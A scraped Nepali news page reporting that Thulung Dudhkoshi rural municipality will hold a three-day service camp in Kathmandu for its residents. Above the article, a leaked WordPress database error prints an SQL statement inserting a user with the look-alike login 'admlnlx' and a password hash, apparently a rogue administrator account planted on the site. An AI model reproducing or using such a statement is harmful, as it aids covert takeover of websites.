WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BfA.dwkuB7wsrt606blC8H6L4Myeei0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 19:14:02', '', 'admlnlx', 'admlnlx')

थुलुङ दुधकोशी गाउँपालिकाले काठमाण्डौमा ३ दिने शिबिर सन्चालन गर्ने – Gaule Khabar

थुलुङ दुधकोशी गाउँपालिकाले काठमाण्डौमा ३ दिने शिबिर सन्चालन गर्ने

थुलुङ दुधकोशी गाउँपालिकाले काठमाण्डौमा ३ दिने शिबिर सन्चालन गर्ने

सोलुखुम्बु । थुलुङ दुधकोशी गाउँपालिकाले काठमाडौं उपत्यकामा रहेका पालिकावासीहरूका लागि ३ दिने शिविर सञ्चालन गर्ने भएको छ ।

काठमाडौंको सुकेधारा स्थित नव दुर्गा पार्टी भेन्युमा यहि साउन १०, ११ र १२ गते उक्त शिबिर सञ्चालन गर्ने भएको हो ।

शिविरमा जन्म, मृत्यु, विवाह, बसाइँसराइ, सम्बन्ध विच्छेदजस्ता पञ्जीकरण सम्बन्धी सेवा, सामाजिक सुरक्षा भत्ता दर्ता तथा नवीकरण, मालपोत तथा भूमि कर संकलन, साथै वडा कार्यपालिकाबाट प्रदान गरिने अन्य प्रशासनिक सेवाहरू उपलब्ध हुने पालिकाले एक सूचना मार्फत जनाएको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका